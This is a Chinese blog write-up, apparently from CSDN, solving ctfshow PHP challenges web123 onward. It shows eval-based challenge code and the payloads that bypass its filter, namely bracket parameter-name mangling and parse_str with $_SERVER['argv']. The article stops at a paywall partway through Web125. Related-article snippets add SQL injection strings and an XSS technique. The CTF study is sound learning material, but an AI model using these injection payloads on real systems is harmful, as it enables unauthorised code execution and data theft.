ctfshow web123-127

原创 已于 2022-02-08 22:56:38 修改 · 3.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web

于 2022-02-08 22:55:47 首次发布
这篇博客探讨了PHP中的eval函数安全问题和CTF挑战中的变量注入技术。通过分析Web123到Web127的代码,展示了如何利用错误检查和编码绕过机制来获取flag。方法包括使用highlight_file函数读取flag.php,利用$_SERVER['argv']数组属性,以及通过URL编码和变量名构造绕过WAF。

目录

Web 123

Web 125

Web 126

Web 127

Web 123

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

方法一:

查看代码后发现$fl0g根本不能用所以用eval函数得到flag,

存在CTF_SHOW存在CTF_SHOW.COM不能存在fl0g

而且执行的是$c

所以我直接POST传入:

CTF_SHOW=&CTF_SHOW.COM=&fun=echo $flag

发现一直无法得到flag,仔细看了一下好像是因为传入的CTF_SHOW.COM中的点会被替换,上网查了如何绕过

在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换

payload:

CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag

方法二:

和125的情况一样,原理125已经解释过了。

Payload:

GET:?a=1+fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])

Web 125

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($
最低0.47元/天 解锁文章
CTFshow php特性 web127
Kradress的博客
12-16 544
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-10 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-10 21:52:49 */ error_reporting(0); include("flag.php"); highlight_file(__FILE__); $ctf_show = m
ctfshow web入门 php特性 web123--web139
2301_81040377的博客
04-06 1410
web133一样的东西但是我们的grep被过滤了,所以得思考一下怎么才行,但是反斜杠引号什么的没过滤,就可以用来绕过。拼接一下ctfshow{25b598bc-5a5b-4baf-a23e-2c4e9dea9d8f}必须传CTF_SHOW,CTF_SHOW.COM 不能有fl0g。就可以绕过对**isset($fl0g)**的判断,用+代表空格。先点击左边的获得域名,然后传参之后再点击右边的刷新结果。他这里对这个就讲的特别详细了,我抄一下。然后我们就可以进行类似的构造。就用argv的方法来写。
Web1.2.3
中段丸家
01-06 1419
大约在1990年代末至2000年代初。Web1.0 是互联网的早期阶段,主要以静态网页为主。信息的发布者和使用者之间的互动相对较低,主要由少数内容提供者掌控。用户主要是被动接收信息,网站主要提供静态内容。2000年代初至2010年代初。Web2.0 标志着互联网变得更加互动和社交。用户能够产生和分享内容,社交媒体、博客、维基百科等兴起。这一阶段强调用户生成的内容、社交互动和富媒体应用。目前还在发展中,可能延续到未来几年。
CTFshow php特性 web123
Kradress的博客
12-16 383
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highl
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 6228
CTFSHOW PHP特性篇 web123-150
[ctfshow web入门-大赛原题]web785-800(部分)
weixin_45751765的博客
06-17 1515
ctfshow web入门大赛原题 乱序写写 有新做的就补上去吧 稍微刷几个做的人比较少的heihei 顺便记录一下参考羽师傅的文章 brain.md: test文件夹覆盖掉软连接 test文件夹中的内容会写入原来test软连接对应的目录 我们动手实测一下 先在uploads目录下建立一个test软连接 然后在别的地方建立一个test文件夹里面随便放个东西 将test文件夹mv至uploads目录下 可以发现软连接所指向的目录多出了test文件夹里存放的东西 niubi 又学到了 zip --symlin
ctfshow web1-14 萌新赛wp
weixin_56546651的博客
06-03 775
经过MySQL编码后会变成’or’6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。经过测试发现题目过滤了空格,使用/**/绕过空格,其余与WEB 2解法相同。经过测试,发现过滤很多,学习借鉴别的师傅写出的python脚本试试。尝试常见的弱口令admin/admin/admin123等无反应。手工尝试SQL注入未果,抓包保存为txt丢给sqlmap同样未果。经过测试,同样仅过滤了空格,同WEB 2。进行目录爆破,发现robots.txt。在多次尝试未果后翻看了别的师傅的wp,
ctfshow web100-105
最新发布
2302_77769584的博客
07-24 1408
ctfshow 100-105
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
brhhh_sehe的博客
12-19 1286
用户在输入框中输入图片地址存储到str变量中 然后在xss()函数里面给id为demo的标签设置内容(innerHTML) 内容是加载图片,所以我们输入时放一个无法加载的图片,然后触发onerror事件,在这个事件里面可以触发弹窗,注意构造payload的时候一定要把img标签进行闭合。自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击。
ctfshow-web入门-php特性(web123web125、web126)
Welcome To My6n Blog
07-16 2265
post 传入 CTF_SHOW 和 CTF_SHOW.COM 确保 isset($_POST['CTF_SHOW']) && isset($_POST['CTF_SHOW.COM']) 这部分条件为真,fun=eval($a[0]) 将 eval($a[0]) 的代码传递给 $c。最后 判断 if($fl0g === "flag_give_me"),因为 $fl0g 被正确地设置为了 'flag_give_me',所以这个条件为真,因此,echo $flag;
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 1405
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
CTFshow web入门web127-php特性30
weixin_74336671的博客
01-03 616
a=2,就会变成$a=2,这里ctf_show有个_需要构造,前面说过php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,这里空格没有被ban,所以我们就使用空格,payload为。函数从数组中将变量导入到当前的符号表,使用数组键名作为变量名,使用数组键值作为变量值。
ctfshow-web-123-150-wp
2301_80915592的博客
12-02 1156
通过$_SERVER['argv']将$a变成数组,再利用数组的性质将fl0g=flag_give_me传入,同时还绕过第一个if中的!执行eval函数也就是执行$c即是parse_str($a[1]),使得fl0g=flag_give_me,从而进入第三个if语句。所以我们我们输入的ctf_show是get传参,然后被$_SERVER['QUERY_STRING']获取赋值给$url,然后进行waf匹配,所以其实就是?,先学习一下这个函数,第一个参数是被调用的函数,第二个是调用的函数的参数。
ctfshow php特性 web89-web115 web123-150wp
mumuzi的博客
02-01 5899
皮爱吃皮特性
ctfshow 105-127
weixin_58519918的博客
06-15 880
wu
ctfshow-web入门-php特性(web127-web131)
Welcome To My6n Blog
07-17 1427
将 $flag 变量进行 MD5 哈希运算,并将结果赋值给 $ctf_show。获取当前请求的查询字符串(query string),查询字符串是 URL 中位于问号 (?) 之后的部分,通常包含一个或多个参数和值。之后对查询字符串采用正则匹配过滤掉了一些符号,符合要求则会将 $_GET 数组中的键值对作为变量导入到当前的符号表中。换句话说,extract($_GET);会将 URL 查询参数中的每个键值对转换成同名的变量。最后要求 $ctf_show==='ilove36d' 就会输出 flag。
CTFSHOW-WEB入门 writeup
abtgu的博客
09-29 1976
web1 题目: 开发注释未及时删除 解题思路: 右键查看源代码即可得到flag。 web2 题目: js前台拦截 === 无效操作 解题思路: 火狐浏览器禁止JavaScript之后,右键查看源代码,得到flag。 web3 题目: 没思路的时候抓个包看看,可能会有意外收获 解题思路: burp抓包,查看响应头,得到flag。 web4 题目: 解题思路: 根据提示访问http://a03708c9-ff09-457d-9688-676ccb7997ce.chall.ctf.show/robots.txt
CTFSHOW WEB题目
qq_45655564的博客
08-09 3271
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
CTFshow命令执行29-123
qq_43534481的博客
08-06 1724
CTFshow命令执行WP
CTFShow-Web6
09-06
根据提供的引用内容,CTFShow-Web6可能是一个数据库名。其中,通过注入语句查询数据库web2中的表信息,得到两张表flag和user。具体的注入语句如下所示: ``` username=1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1 ``` ``` username='/**/or/**/1=2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123 ``` 通过这些注入语句可以得到数据库web2中的两张表信息,分别为flag和user。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshowweb6](https://blog.youkuaiyun.com/zzwwhhpp/article/details/116498386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow-web6](https://blog.youkuaiyun.com/weixin_52497013/article/details/122095160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值